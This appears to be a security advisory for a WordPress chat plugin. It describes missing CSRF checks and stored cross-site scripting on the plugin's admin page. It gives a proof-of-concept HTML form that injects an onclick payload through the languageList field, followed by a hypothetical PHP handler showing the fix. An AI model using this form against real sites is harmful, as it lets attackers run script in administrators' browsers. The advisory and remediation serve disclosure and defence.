The plugin does not properly check CSRF tokens on POST requests to the plugin's admin page and does not sanitise some parameters. This leads to a stored Cross-Site Scripting vulnerability in which an attacker can trick a logged-in administrator into injecting arbitrary JavaScript.
<html>
<body>
<form method="POST" action="https://127.0.0.1/wordpress/wp-admin/admin.php?page=jivosite.php">
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="userPassword" value="Test123"/>
<input type="hidden" name="userDisplayName" value="test123"/>
<input type="hidden" name="languageList" value='1337" onclick=alert(/XSS/) test="'/>
<input type="submit" value="Submit">
</form>
</body>
</html>
The XSS is triggered when the admin clicks "Go to Web Application".
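
For comparison, a settings handler that closes both gaps described above (nonce check on the POST, validation on input, escaping on output). This is an added example, not the plugin's own code: the function names, nonce action, option key and language-code format are hypothetical, and only the `languageList` parameter name comes from the form above.

```php
<?php
// Added illustration: hypothetical WordPress settings handler (not the plugin's code).
const EXAMPLE_NONCE_ACTION = 'example_chat_save_settings'; // assumed nonce action

// Render the settings form with a nonce bound to the current user and action.
function example_chat_render_form() {
    $lang = get_option( 'example_chat_language', 'en' ); // assumed option key
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="example_chat_save"/>';
    wp_nonce_field( EXAMPLE_NONCE_ACTION ); // emits the hidden _wpnonce field
    // esc_attr() encodes quotes, so a stored value cannot close the attribute
    // and append an event handler such as onclick.
    echo '<input type="text" name="languageList" value="' . esc_attr( $lang ) . '"/>';
    echo '<input type="submit" value="Save"/>';
    echo '</form>';
}

// Handle the POST: capability check, nonce check, then validate before storing.
function example_chat_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request if _wpnonce is missing or invalid. A form hosted on
    // another origin cannot know the administrator's nonce.
    check_admin_referer( EXAMPLE_NONCE_ACTION );

    $lang = isset( $_POST['languageList'] )
        ? sanitize_text_field( wp_unslash( $_POST['languageList'] ) )
        : '';
    // Allow-list the value: a language code only (assumed format, e.g. "en", "pt_BR").
    if ( ! preg_match( '/^[a-z]{2}(_[A-Z]{2})?$/', $lang ) ) {
        $lang = 'en';
    }
    update_option( 'example_chat_language', $lang );

    wp_safe_redirect( admin_url( 'admin.php?page=example-chat' ) ); // assumed page slug
    exit;
}
// admin-post.php dispatches on the "action" field, so this handler runs only
// for this form and only for logged-in users.
add_action( 'admin_post_example_chat_save', 'example_chat_save_settings' );
```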